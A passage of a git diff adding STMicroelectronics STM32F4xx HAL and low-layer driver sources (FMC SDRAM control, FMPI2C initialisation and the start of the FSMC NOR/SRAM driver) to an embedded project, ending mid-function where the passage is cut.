assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_SDRAM_BANK(Init->SDBank)); + assert_param(IS_FMC_COLUMNBITS_NUMBER(Init->ColumnBitsNumber)); + assert_param(IS_FMC_ROWBITS_NUMBER(Init->RowBitsNumber)); + assert_param(IS_FMC_SDMEMORY_WIDTH(Init->MemoryDataWidth)); + assert_param(IS_FMC_INTERNALBANK_NUMBER(Init->InternalBankNumber)); + assert_param(IS_FMC_CAS_LATENCY(Init->CASLatency)); + assert_param(IS_FMC_WRITE_PROTECTION(Init->WriteProtection)); + assert_param(IS_FMC_SDCLOCK_PERIOD(Init->SDClockPeriod)); + assert_param(IS_FMC_READ_BURST(Init->ReadBurst)); + assert_param(IS_FMC_READPIPE_DELAY(Init->ReadPipeDelay)); + + /* Set SDRAM bank configuration parameters */ + if (Init->SDBank != FMC_SDRAM_BANK2) + { + tmpr1 = Device->SDCR[FMC_SDRAM_BANK1]; + + /* Clear NC, NR, MWID, NB, CAS, WP, SDCLK, RBURST, and RPIPE bits */ + tmpr1 &= ((uint32_t)~(FMC_SDCR1_NC | FMC_SDCR1_NR | FMC_SDCR1_MWID | \ + FMC_SDCR1_NB | FMC_SDCR1_CAS | FMC_SDCR1_WP | \ + FMC_SDCR1_SDCLK | FMC_SDCR1_RBURST | FMC_SDCR1_RPIPE)); + + + tmpr1 |= (uint32_t)(Init->ColumnBitsNumber |\ + Init->RowBitsNumber |\ + Init->MemoryDataWidth |\ + Init->InternalBankNumber |\ + Init->CASLatency |\ + Init->WriteProtection |\ + Init->SDClockPeriod |\ + Init->ReadBurst |\ + Init->ReadPipeDelay + ); + Device->SDCR[FMC_SDRAM_BANK1] = tmpr1; + } + else /* FMC_Bank2_SDRAM */ + { + tmpr1 = Device->SDCR[FMC_SDRAM_BANK1]; + + /* Clear NC, NR, MWID, NB, CAS, WP, SDCLK, RBURST, and RPIPE bits */ + tmpr1 &= ((uint32_t)~(FMC_SDCR1_SDCLK | FMC_SDCR1_RBURST | FMC_SDCR1_RPIPE)); + + tmpr1 |= (uint32_t)(Init->SDClockPeriod |\ + Init->ReadBurst |\ + Init->ReadPipeDelay); + + tmpr2 = Device->SDCR[FMC_SDRAM_BANK2]; + + /* Clear NC, NR, MWID, NB, CAS, WP, SDCLK, RBURST, and RPIPE bits */ + tmpr2 &= ((uint32_t)~(FMC_SDCR1_NC | FMC_SDCR1_NR | FMC_SDCR1_MWID | \ + FMC_SDCR1_NB | FMC_SDCR1_CAS | FMC_SDCR1_WP | \ + FMC_SDCR1_SDCLK | FMC_SDCR1_RBURST | FMC_SDCR1_RPIPE)); + + tmpr2 |= (uint32_t)(Init->ColumnBitsNumber |\ + Init->RowBitsNumber |\ + Init->MemoryDataWidth |\ + Init->InternalBankNumber |\ + Init->CASLatency |\ + Init->WriteProtection); + + Device->SDCR[FMC_SDRAM_BANK1] = tmpr1; + Device->SDCR[FMC_SDRAM_BANK2] = tmpr2; + } + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_SDRAM device timing according to the specified + * parameters in the FMC_SDRAM_TimingTypeDef + * @param Device Pointer to SDRAM device instance + * @param Timing Pointer to SDRAM Timing structure + * @param Bank SDRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_SDRAM_Timing_Init(FMC_SDRAM_TypeDef *Device, FMC_SDRAM_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr1 = 0U; + uint32_t tmpr2 = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_LOADTOACTIVE_DELAY(Timing->LoadToActiveDelay)); + assert_param(IS_FMC_EXITSELFREFRESH_DELAY(Timing->ExitSelfRefreshDelay)); + assert_param(IS_FMC_SELFREFRESH_TIME(Timing->SelfRefreshTime)); + assert_param(IS_FMC_ROWCYCLE_DELAY(Timing->RowCycleDelay)); + assert_param(IS_FMC_WRITE_RECOVERY_TIME(Timing->WriteRecoveryTime)); + assert_param(IS_FMC_RP_DELAY(Timing->RPDelay)); + assert_param(IS_FMC_RCD_DELAY(Timing->RCDDelay)); + assert_param(IS_FMC_SDRAM_BANK(Bank)); + + /* Set SDRAM device timing parameters */ + if (Bank != FMC_SDRAM_BANK2) + { + tmpr1 = Device->SDTR[FMC_SDRAM_BANK1]; + + /* Clear TMRD, TXSR, TRAS, TRC, TWR, TRP and TRCD bits */ + tmpr1 &= ((uint32_t)~(FMC_SDTR1_TMRD | FMC_SDTR1_TXSR | FMC_SDTR1_TRAS | \ + FMC_SDTR1_TRC | FMC_SDTR1_TWR | FMC_SDTR1_TRP | \ + FMC_SDTR1_TRCD)); + + tmpr1 |= (uint32_t)(((Timing->LoadToActiveDelay)-1U) |\ + (((Timing->ExitSelfRefreshDelay)-1U) << 4U) |\ + (((Timing->SelfRefreshTime)-1U) << 8U) |\ + (((Timing->RowCycleDelay)-1U) << 12U) |\ + (((Timing->WriteRecoveryTime)-1U) <<16U) |\ + (((Timing->RPDelay)-1U) << 20U) |\ + (((Timing->RCDDelay)-1U) << 24U)); + Device->SDTR[FMC_SDRAM_BANK1] = tmpr1; + } + else /* FMC_Bank2_SDRAM */ + { + tmpr1 = Device->SDTR[FMC_SDRAM_BANK1]; + + /* Clear TRC and TRP bits */ + tmpr1 &= ((uint32_t)~(FMC_SDTR1_TRC | FMC_SDTR1_TRP)); + + tmpr1 |= (uint32_t)((((Timing->RowCycleDelay)-1U) << 12U) |\ + (((Timing->RPDelay)-1U) << 20U)); + + tmpr2 = Device->SDTR[FMC_SDRAM_BANK2]; + + /* Clear TMRD, TXSR, TRAS, TRC, TWR, TRP and TRCD bits */ + tmpr2 &= ((uint32_t)~(FMC_SDTR1_TMRD | FMC_SDTR1_TXSR | FMC_SDTR1_TRAS | \ + FMC_SDTR1_TRC | FMC_SDTR1_TWR | FMC_SDTR1_TRP | \ + FMC_SDTR1_TRCD)); + + tmpr2 |= (uint32_t)((((Timing->LoadToActiveDelay)-1U) |\ + (((Timing->ExitSelfRefreshDelay)-1U) << 4U) |\ + (((Timing->SelfRefreshTime)-1U) << 8U) |\ + (((Timing->WriteRecoveryTime)-1U) <<16U) |\ + (((Timing->RCDDelay)-1U) << 24U))); + + Device->SDTR[FMC_SDRAM_BANK1] = tmpr1; + Device->SDTR[FMC_SDRAM_BANK2] = tmpr2; + } + return HAL_OK; +} + +/** + * @brief DeInitializes the FMC_SDRAM peripheral + * @param Device Pointer to SDRAM device instance + * @retval HAL status + */ +HAL_StatusTypeDef FMC_SDRAM_DeInit(FMC_SDRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_SDRAM_BANK(Bank)); + + /* De-initialize the SDRAM device */ + Device->SDCR[Bank] = 0x000002D0U; + Device->SDTR[Bank] = 0x0FFFFFFFU; + Device->SDCMR = 0x00000000U; + Device->SDRTR = 0x00000000U; + Device->SDSR = 0x00000000U; + + return HAL_OK; +} + +/** + * @} + */ + +/** @addtogroup FMC_LL_SDRAMPrivate_Functions_Group2 + * @brief management functions + * +@verbatim + ============================================================================== + ##### FMC_SDRAM Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the FMC SDRAM interface. + +@endverbatim + * @{ + */ +/** + * @brief Enables dynamically FMC_SDRAM write protection. + * @param Device Pointer to SDRAM device instance + * @param Bank SDRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_SDRAM_WriteProtection_Enable(FMC_SDRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_SDRAM_BANK(Bank)); + + /* Enable write protection */ + Device->SDCR[Bank] |= FMC_SDRAM_WRITE_PROTECTION_ENABLE; + + return HAL_OK; +} + +/** + * @brief Disables dynamically FMC_SDRAM write protection. + * @param hsdram FMC_SDRAM handle + * @retval HAL status + */ +HAL_StatusTypeDef FMC_SDRAM_WriteProtection_Disable(FMC_SDRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_SDRAM_BANK(Bank)); + + /* Disable write protection */ + Device->SDCR[Bank] &= ~FMC_SDRAM_WRITE_PROTECTION_ENABLE; + + return HAL_OK; +} + +/** + * @brief Send Command to the FMC SDRAM bank + * @param Device Pointer to SDRAM device instance + * @param Command Pointer to SDRAM command structure + * @param Timing Pointer to SDRAM Timing structure + * @param Timeout Timeout wait value + * @retval HAL state + */ +HAL_StatusTypeDef FMC_SDRAM_SendCommand(FMC_SDRAM_TypeDef *Device, FMC_SDRAM_CommandTypeDef *Command, uint32_t Timeout) +{ + __IO uint32_t tmpr = 0U; + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_COMMAND_MODE(Command->CommandMode)); + assert_param(IS_FMC_COMMAND_TARGET(Command->CommandTarget)); + assert_param(IS_FMC_AUTOREFRESH_NUMBER(Command->AutoRefreshNumber)); + assert_param(IS_FMC_MODE_REGISTER(Command->ModeRegisterDefinition)); + + /* Set command register */ + tmpr = (uint32_t)((Command->CommandMode) |\ + (Command->CommandTarget) |\ + (((Command->AutoRefreshNumber)-1U) << 5U) |\ + ((Command->ModeRegisterDefinition) << 9U) + ); + + Device->SDCMR = tmpr; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until command is send */ + while(HAL_IS_BIT_SET(Device->SDSR, FMC_SDSR_BUSY)) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + return HAL_TIMEOUT; + } + } + } + + return HAL_OK; +} + +/** + * @brief Program the SDRAM Memory Refresh rate. + * @param Device Pointer to SDRAM device instance + * @param RefreshRate The SDRAM refresh rate value. + * @retval HAL state + */ +HAL_StatusTypeDef FMC_SDRAM_ProgramRefreshRate(FMC_SDRAM_TypeDef *Device, uint32_t RefreshRate) +{ + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_REFRESH_RATE(RefreshRate)); + + /* Set the refresh rate in command register */ + Device->SDRTR |= (RefreshRate<<1U); + + return HAL_OK; +} + +/** + * @brief Set the Number of consecutive SDRAM Memory auto Refresh commands. + * @param Device Pointer to SDRAM device instance + * @param AutoRefreshNumber Specifies the auto Refresh number. + * @retval None + */ +HAL_StatusTypeDef FMC_SDRAM_SetAutoRefreshNumber(FMC_SDRAM_TypeDef *Device, uint32_t AutoRefreshNumber) +{ + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_AUTOREFRESH_NUMBER(AutoRefreshNumber)); + + /* Set the Auto-refresh number in command register */ + Device->SDCMR |= (AutoRefreshNumber << 5U); + + return HAL_OK; +} + +/** + * @brief Returns the indicated FMC SDRAM bank mode status. + * @param Device Pointer to SDRAM device instance + * @param Bank Defines the FMC SDRAM bank. This parameter can be + * FMC_Bank1_SDRAM or FMC_Bank2_SDRAM. + * @retval The FMC SDRAM bank mode status, could be on of the following values: + * FMC_SDRAM_NORMAL_MODE, FMC_SDRAM_SELF_REFRESH_MODE or + * FMC_SDRAM_POWER_DOWN_MODE. + */ +uint32_t FMC_SDRAM_GetModeStatus(FMC_SDRAM_TypeDef *Device, uint32_t Bank) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_SDRAM_DEVICE(Device)); + assert_param(IS_FMC_SDRAM_BANK(Bank)); + + /* Get the corresponding bank mode */ + if(Bank == FMC_SDRAM_BANK1) + { + tmpreg = (uint32_t)(Device->SDSR & FMC_SDSR_MODES1); + } + else + { + tmpreg = ((uint32_t)(Device->SDSR & FMC_SDSR_MODES2) >> 2U); + } + + /* Return the mode status */ + return tmpreg; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx */ +#endif /* HAL_SRAM_MODULE_ENABLED || HAL_NOR_MODULE_ENABLED || HAL_NAND_MODULE_ENABLED || HAL_PCCARD_MODULE_ENABLED || HAL_SDRAM_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fmpi2c.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fmpi2c.c new file mode 100644 index 000000000..8fcb2a158 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fmpi2c.c @@ -0,0 +1,220 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_fmpi2c.c + * @author MCD Application Team + * @brief FMPI2C LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +#if defined(FMPI2C_CR1_PE) +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_fmpi2c.h" +#include "stm32f4xx_ll_bus.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (FMPI2C1) + +/** @defgroup FMPI2C_LL FMPI2C + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup FMPI2C_LL_Private_Macros + * @{ + */ + +#define IS_LL_FMPI2C_PERIPHERAL_MODE(__VALUE__) (((__VALUE__) == LL_FMPI2C_MODE_I2C) || \ + ((__VALUE__) == LL_FMPI2C_MODE_SMBUS_HOST) || \ + ((__VALUE__) == LL_FMPI2C_MODE_SMBUS_DEVICE) || \ + ((__VALUE__) == LL_FMPI2C_MODE_SMBUS_DEVICE_ARP)) + +#define IS_LL_FMPI2C_ANALOG_FILTER(__VALUE__) (((__VALUE__) == LL_FMPI2C_ANALOGFILTER_ENABLE) || \ + ((__VALUE__) == LL_FMPI2C_ANALOGFILTER_DISABLE)) + +#define IS_LL_FMPI2C_DIGITAL_FILTER(__VALUE__) ((__VALUE__) <= 0x0000000FU) + +#define IS_LL_FMPI2C_OWN_ADDRESS1(__VALUE__) ((__VALUE__) <= 0x000003FFU) + +#define IS_LL_FMPI2C_TYPE_ACKNOWLEDGE(__VALUE__) (((__VALUE__) == LL_FMPI2C_ACK) || \ + ((__VALUE__) == LL_FMPI2C_NACK)) + +#define IS_LL_FMPI2C_OWN_ADDRSIZE(__VALUE__) (((__VALUE__) == LL_FMPI2C_OWNADDRESS1_7BIT) || \ + ((__VALUE__) == LL_FMPI2C_OWNADDRESS1_10BIT)) +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup FMPI2C_LL_Exported_Functions + * @{ + */ + +/** @addtogroup FMPI2C_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the FMPI2C registers to their default reset values. + * @param FMPI2Cx FMPI2C Instance. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: FMPI2C registers are de-initialized + * - ERROR: FMPI2C registers are not de-initialized + */ +ErrorStatus LL_FMPI2C_DeInit(FMPI2C_TypeDef *FMPI2Cx) +{ + ErrorStatus status = SUCCESS; + + /* Check the FMPI2C Instance FMPI2Cx */ + assert_param(IS_FMPI2C_ALL_INSTANCE(FMPI2Cx)); + + if (FMPI2Cx == FMPI2C1) + { + /* Force reset of FMPI2C clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_FMPI2C1); + + /* Release reset of FMPI2C clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_FMPI2C1); + } + else + { + status = ERROR; + } + + return status; +} + +/** + * @brief Initialize the FMPI2C registers according to the specified parameters in FMPI2C_InitStruct. + * @param FMPI2Cx FMPI2C Instance. + * @param FMPI2C_InitStruct pointer to a @ref LL_FMPI2C_InitTypeDef structure. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: FMPI2C registers are initialized + * - ERROR: Not applicable + */ +ErrorStatus LL_FMPI2C_Init(FMPI2C_TypeDef *FMPI2Cx, LL_FMPI2C_InitTypeDef *FMPI2C_InitStruct) +{ + /* Check the FMPI2C Instance FMPI2Cx */ + assert_param(IS_FMPI2C_ALL_INSTANCE(FMPI2Cx)); + + /* Check the FMPI2C parameters from FMPI2C_InitStruct */ + assert_param(IS_LL_FMPI2C_PERIPHERAL_MODE(FMPI2C_InitStruct->PeripheralMode)); + assert_param(IS_LL_FMPI2C_ANALOG_FILTER(FMPI2C_InitStruct->AnalogFilter)); + assert_param(IS_LL_FMPI2C_DIGITAL_FILTER(FMPI2C_InitStruct->DigitalFilter)); + assert_param(IS_LL_FMPI2C_OWN_ADDRESS1(FMPI2C_InitStruct->OwnAddress1)); + assert_param(IS_LL_FMPI2C_TYPE_ACKNOWLEDGE(FMPI2C_InitStruct->TypeAcknowledge)); + assert_param(IS_LL_FMPI2C_OWN_ADDRSIZE(FMPI2C_InitStruct->OwnAddrSize)); + + /* Disable the selected FMPI2Cx Peripheral */ + LL_FMPI2C_Disable(FMPI2Cx); + + /*---------------------------- FMPI2Cx CR1 Configuration ------------------------ + * Configure the analog and digital noise filters with parameters : + * - AnalogFilter: FMPI2C_CR1_ANFOFF bit + * - DigitalFilter: FMPI2C_CR1_DNF[3:0] bits + */ + LL_FMPI2C_ConfigFilters(FMPI2Cx, FMPI2C_InitStruct->AnalogFilter, FMPI2C_InitStruct->DigitalFilter); + + /*---------------------------- FMPI2Cx TIMINGR Configuration -------------------- + * Configure the SDA setup, hold time and the SCL high, low period with parameter : + * - Timing: FMPI2C_TIMINGR_PRESC[3:0], FMPI2C_TIMINGR_SCLDEL[3:0], FMPI2C_TIMINGR_SDADEL[3:0], + * FMPI2C_TIMINGR_SCLH[7:0] and FMPI2C_TIMINGR_SCLL[7:0] bits + */ + LL_FMPI2C_SetTiming(FMPI2Cx, FMPI2C_InitStruct->Timing); + + /* Enable the selected FMPI2Cx Peripheral */ + LL_FMPI2C_Enable(FMPI2Cx); + + /*---------------------------- FMPI2Cx OAR1 Configuration ----------------------- + * Disable, Configure and Enable FMPI2Cx device own address 1 with parameters : + * - OwnAddress1: FMPI2C_OAR1_OA1[9:0] bits + * - OwnAddrSize: FMPI2C_OAR1_OA1MODE bit + */ + LL_FMPI2C_DisableOwnAddress1(FMPI2Cx); + LL_FMPI2C_SetOwnAddress1(FMPI2Cx, FMPI2C_InitStruct->OwnAddress1, FMPI2C_InitStruct->OwnAddrSize); + + /* OwnAdress1 == 0 is reserved for General Call address */ + if (FMPI2C_InitStruct->OwnAddress1 != 0U) + { + LL_FMPI2C_EnableOwnAddress1(FMPI2Cx); + } + + /*---------------------------- FMPI2Cx MODE Configuration ----------------------- + * Configure FMPI2Cx peripheral mode with parameter : + * - PeripheralMode: FMPI2C_CR1_SMBDEN and FMPI2C_CR1_SMBHEN bits + */ + LL_FMPI2C_SetMode(FMPI2Cx, FMPI2C_InitStruct->PeripheralMode); + + /*---------------------------- FMPI2Cx CR2 Configuration ------------------------ + * Configure the ACKnowledge or Non ACKnowledge condition + * after the address receive match code or next received byte with parameter : + * - TypeAcknowledge: FMPI2C_CR2_NACK bit + */ + LL_FMPI2C_AcknowledgeNextData(FMPI2Cx, FMPI2C_InitStruct->TypeAcknowledge); + + return SUCCESS; +} + +/** + * @brief Set each @ref LL_FMPI2C_InitTypeDef field to default value. + * @param FMPI2C_InitStruct Pointer to a @ref LL_FMPI2C_InitTypeDef structure. + * @retval None + */ +void LL_FMPI2C_StructInit(LL_FMPI2C_InitTypeDef *FMPI2C_InitStruct) +{ + /* Set FMPI2C_InitStruct fields to default values */ + FMPI2C_InitStruct->PeripheralMode = LL_FMPI2C_MODE_I2C; + FMPI2C_InitStruct->Timing = 0U; + FMPI2C_InitStruct->AnalogFilter = LL_FMPI2C_ANALOGFILTER_ENABLE; + FMPI2C_InitStruct->DigitalFilter = 0U; + FMPI2C_InitStruct->OwnAddress1 = 0U; + FMPI2C_InitStruct->TypeAcknowledge = LL_FMPI2C_NACK; + FMPI2C_InitStruct->OwnAddrSize = LL_FMPI2C_OWNADDRESS1_7BIT; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* FMPI2C1 */ + +/** + * @} + */ + +#endif /* FMPI2C_CR1_PE */ +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fsmc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fsmc.c new file mode 100644 index 000000000..986813744 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fsmc.c @@ -0,0 +1,1009 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_fsmc.c + * @author MCD Application Team + * @brief FSMC Low Layer HAL module driver. + * + * This file provides firmware functions to manage the following + * functionalities of the Flexible Static Memory Controller (FSMC) peripheral memories: + * + Initialization/de-initialization functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### FSMC peripheral features ##### + ============================================================================== + [..] The Flexible static memory controller (FSMC) includes two memory controllers: + (+) The NOR/PSRAM memory controller + (+) The NAND/PC Card memory controller + + [..] The FSMC functional block makes the interface with synchronous and asynchronous static + memories, SDRAM memories, and 16-bit PC memory cards. Its main purposes are: + (+) to translate AHB transactions into the appropriate external device protocol. + (+) to meet the access time requirements of the external memory devices. + + [..] All external memories share the addresses, data and control signals with the controller. + Each external device is accessed by means of a unique Chip Select. The FSMC performs + only one access at a time to an external device. + The main features of the FSMC controller are the following: + (+) Interface with static-memory mapped devices including: + (++) Static random access memory (SRAM). + (++) Read-only memory (ROM). + (++) NOR Flash memory/OneNAND Flash memory. + (++) PSRAM (4 memory banks). + (++) 16-bit PC Card compatible devices. + (++) Two banks of NAND Flash memory with ECC hardware to check up to 8 Kbytes of + data. + (+) Independent Chip Select control for each memory bank. + (+) Independent configuration for each memory bank. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FSMC_LL FSMC Low Layer + * @brief FSMC driver modules + * @{ + */ + +#if defined (HAL_SRAM_MODULE_ENABLED) || defined(HAL_NOR_MODULE_ENABLED) || defined(HAL_NAND_MODULE_ENABLED) || defined(HAL_PCCARD_MODULE_ENABLED) +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F413xx) || defined(STM32F423xx) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup FSMC_LL_Private_Functions + * @{ + */ + +/** @addtogroup FSMC_LL_NORSRAM + * @brief NORSRAM Controller functions + * + @verbatim + ============================================================================== + ##### How to use NORSRAM device driver ##### + ============================================================================== + + [..] + This driver contains a set of APIs to interface with the FSMC NORSRAM banks in order + to run the NORSRAM external devices. + + (+) FSMC NORSRAM bank reset using the function FSMC_NORSRAM_DeInit() + (+) FSMC NORSRAM bank control configuration using the function FSMC_NORSRAM_Init() + (+) FSMC NORSRAM bank timing configuration using the function FSMC_NORSRAM_Timing_Init() + (+) FSMC NORSRAM bank extended timing configuration using the function + FSMC_NORSRAM_Extended_Timing_Init() + (+) FSMC NORSRAM bank enable/disable write operation using the functions + FSMC_NORSRAM_WriteOperation_Enable()/FSMC_NORSRAM_WriteOperation_Disable() + +@endverbatim + * @{ + */ + +/** @addtogroup FSMC_LL_NORSRAM_Private_Functions_Group1 + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FSMC NORSRAM interface + (+) De-initialize the FSMC NORSRAM interface + (+) Configure the FSMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the FSMC_NORSRAM device according to the specified + * control parameters in the FSMC_NORSRAM_InitTypeDef + * @param Device Pointer to NORSRAM device instance + * @param Init Pointer to NORSRAM Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NORSRAM_Init(FSMC_NORSRAM_TypeDef *Device, FSMC_NORSRAM_InitTypeDef* Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FSMC_NORSRAM_BANK(Init->NSBank)); + assert_param(IS_FSMC_MUX(Init->DataAddressMux)); + assert_param(IS_FSMC_MEMORY(Init->MemoryType)); + assert_param(IS_FSMC_NORSRAM_MEMORY_WIDTH(Init->MemoryDataWidth)); + assert_param(IS_FSMC_BURSTMODE(Init->BurstAccessMode)); + assert_param(IS_FSMC_WAIT_POLARITY(Init->WaitSignalPolarity)); +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) + assert_param(IS_FSMC_WRAP_MODE(Init->WrapMode)); +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx */ + assert_param(IS_FSMC_WAIT_SIGNAL_ACTIVE(Init->WaitSignalActive)); + assert_param(IS_FSMC_WRITE_OPERATION(Init->WriteOperation)); + assert_param(IS_FSMC_WAITE_SIGNAL(Init->WaitSignal)); + assert_param(IS_FSMC_EXTENDED_MODE(Init->ExtendedMode)); + assert_param(IS_FSMC_ASYNWAIT(Init->AsynchronousWait)); + assert_param(IS_FSMC_WRITE_BURST(Init->WriteBurst)); + assert_param(IS_FSMC_PAGESIZE(Init->PageSize)); +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F413xx) || defined(STM32F423xx) + assert_param(IS_FSMC_WRITE_FIFO(Init->WriteFifo)); + assert_param(IS_FSMC_CONTINOUS_CLOCK(Init->ContinuousClock)); +#endif /* STM32F412Zx || STM32F412Vx || STM32F413xx || STM32F423xx */ + + /* Get the BTCR register value */ + tmpr = Device->BTCR[Init->NSBank]; + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) + /* Clear MBKEN, MUXEN, MTYP, MWID, FACCEN, BURSTEN, WAITPOL, WRAPMOD, WAITCFG, WREN, + WAITEN, EXTMOD, ASYNCWAIT, CPSIZE and CBURSTRW bits */ + tmpr &= ((uint32_t)~(FSMC_BCR1_MBKEN | FSMC_BCR1_MUXEN | FSMC_BCR1_MTYP | \ + FSMC_BCR1_MWID | FSMC_BCR1_FACCEN | FSMC_BCR1_BURSTEN | \ + FSMC_BCR1_WAITPOL | FSMC_BCR1_WRAPMOD | FSMC_BCR1_WAITCFG | \ + FSMC_BCR1_WREN | FSMC_BCR1_WAITEN | FSMC_BCR1_EXTMOD | \ + FSMC_BCR1_ASYNCWAIT | FSMC_BCR1_CPSIZE | FSMC_BCR1_CBURSTRW)); + /* Set NORSRAM device control parameters */ + tmpr |= (uint32_t)(Init->DataAddressMux |\ + Init->MemoryType |\ + Init->MemoryDataWidth |\ + Init->BurstAccessMode |\ + Init->WaitSignalPolarity |\ + Init->WrapMode |\ + Init->WaitSignalActive |\ + Init->WriteOperation |\ + Init->WaitSignal |\ + Init->ExtendedMode |\ + Init->AsynchronousWait |\ + Init->PageSize |\ + Init->WriteBurst + ); +#else /* STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F413xx || STM32F423xx */ + /* Clear MBKEN, MUXEN, MTYP, MWID, FACCEN, BURSTEN, WAITPOL, WAITCFG, WREN, + WAITEN, EXTMOD, ASYNCWAIT,CPSIZE, CBURSTRW, CCLKEN and WFDIS bits */ + tmpr &= ((uint32_t)~(FSMC_BCR1_MBKEN | FSMC_BCR1_MUXEN | FSMC_BCR1_MTYP | \ + FSMC_BCR1_MWID | FSMC_BCR1_FACCEN | FSMC_BCR1_BURSTEN | \ + FSMC_BCR1_WAITPOL | FSMC_BCR1_WAITCFG | FSMC_BCR1_WREN | \ + FSMC_BCR1_WAITEN | FSMC_BCR1_EXTMOD | FSMC_BCR1_ASYNCWAIT | \ + FSMC_BCR1_CPSIZE | FSMC_BCR1_CBURSTRW | FSMC_BCR1_CCLKEN | \ + FSMC_BCR1_WFDIS)); + /* Set NORSRAM device control parameters */ + tmpr |= (uint32_t)(Init->DataAddressMux |\ + Init->MemoryType |\ + Init->MemoryDataWidth |\ + Init->BurstAccessMode |\ + Init->WaitSignalPolarity |\ + Init->WaitSignalActive |\ + 